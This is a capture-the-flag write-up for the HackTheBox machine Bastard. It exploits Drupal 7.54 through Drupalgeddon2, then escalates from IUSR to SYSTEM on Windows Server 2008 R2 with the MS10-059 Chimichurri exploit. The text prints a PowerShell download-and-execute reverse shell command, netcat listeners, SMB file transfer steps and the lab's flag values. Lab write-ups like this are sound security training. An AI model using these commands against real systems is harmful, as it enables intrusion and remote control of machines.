HackTheBox Bastard
Writeup for HackTheBox Bastard
Machine Synopsis
Key Exploitation Techniques:
- Drupal 7.x Remote Code Execution (Drupalgeddon2 - CVE-2018-7600)
- PowerShell Reverse Shell (Nishang)
- Windows Kernel Privilege Escalation (MS10-059)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nmap -sC -sV -A 10.10.10.9
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Attempts to brute-force the login page or register accounts were unsuccessful.
The CHANGELOG.txt file (filtered by robots.txt but publicly accessible) revealed the specific version: Drupal 7.54.
Exploitation
Initial Access (NT AUTHORITY\IUSR)
Drupal 7.54 is vulnerable to Drupalgeddon2 (CVE-2018-7600), a critical remote code execution vulnerability. A Python exploit script for this was used. The script required the highline Ruby gem to be installed.
1
2
3
4
5
6
7
8
9
$ git clone https://github.com/dreadlocked/Drupalgeddon2
$ cd Drupalgeddon2
$ gem install highline
$ ruby drupalgeddon2.rb
Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]
Example for target that does not require authentication:
ruby drupalgeddon2.rb https://example.com
Example for target that does require authentication:
ruby drupalgeddon2.rb https://example.com --authentication
The exploit successfully identified the Drupal version and confirmed code execution, but failed to write a web shell directly to disk. This forced direct OS command execution through the vulnerability.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
[+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
...
[*] Testing: Code Execution (Method: name)
[i] Payload: echo SKJNUYPS
[+] Result : SKJNUYPS
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
...
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr
The shell within the drupalgeddon2 script confirmed execution as nt authority\iusr. To gain a more stable and interactive shell, Nishang’s Invoke-PowerShellTcp reverse shell was used.
The shell.ps1 script (containing Invoke-PowerShellTcp) was hosted on an attacker-controlled HTTP server.
1
2
3
# Attacker machine: Host shell.ps1
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 ([http://0.0.0.0:80/](http://0.0.0.0:80/)) ...
The PowerShell script was executed on the target via the Drupalgeddon2 shell.
1
drupalgeddon2>> powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.9/shell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 1234
A netcat listener was set up to catch the reverse shell.
1
2
# Attacker machine: Netcat listener
$ nc -nlvp 1234
1
2
3
4
5
6
7
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.9] 49443
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\inetpub\drupal-7.54> whoami
nt authority\iusr
A stable PowerShell shell was obtained as nt authority\iusr.
Privilege Escalation
Windows Kernel Exploit (MS10-059)
systeminfo was used to gather operating system details for privilege escalation.
1
2
3
4
5
6
7
8
PS C:\inetpub\drupal-7.54> systeminfo
...
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
System Type: x64-based PC
Hotfix(s): N/A
...
The system was identified as Microsoft Windows Server 2008 R2 Datacenter. Windows-Exploit-Suggester was used to identify applicable local privilege escalation exploits.
1
2
3
4
5
6
7
$ git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
$ mousepad systeminfo.txt
$ Windows-Exploit-Suggester/windows-exploit-suggester.py --update
$ Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2022-04-21-mssb.xls --systeminfo systeminfo.txt
...
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
...
The suggester highlighted MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799). The exploit for this vulnerability, Chimichurri.exe, was downloaded.
Chimichurri.exe was hosted on an impacket SMB server for transfer to the target.
1
$ python /opt/impacket-0.9.19/examples/smbserver.py share .
On the target, net use was used to map the SMB share, and Chimichurri.exe was copied.
1
2
PS C:\inetpub\drupal-7.54> net use \\10.10.14.9\share
PS C:\inetpub\drupal-7.54> copy \\10.10.14.9\share\Chimichurri.exe
A netcat listener was set up. Chimichurri.exe was executed with the attacker’s IP and a chosen port, initiating a reverse shell with nt authority\system privileges
1
PS C:\inetpub\drupal-7.54> .\Chimichurri.exe 10.10.14.9 9999
1
2
$ nc -nlvp 9999
listening on [any] 9999 ...
1
2
3
4
5
6
7
8
9
10
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.9] 49447
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
nt authority\system
C:\inetpub\drupal-7.54>type dimitris\Desktop\user.txt
6be104d8d9844053846a3bada22a202c
C:\inetpub\drupal-7.54>type administrator\Desktop\root.txt
b31f4550141382cae0433214a2e97152
The user.txt and root.txt flags were located.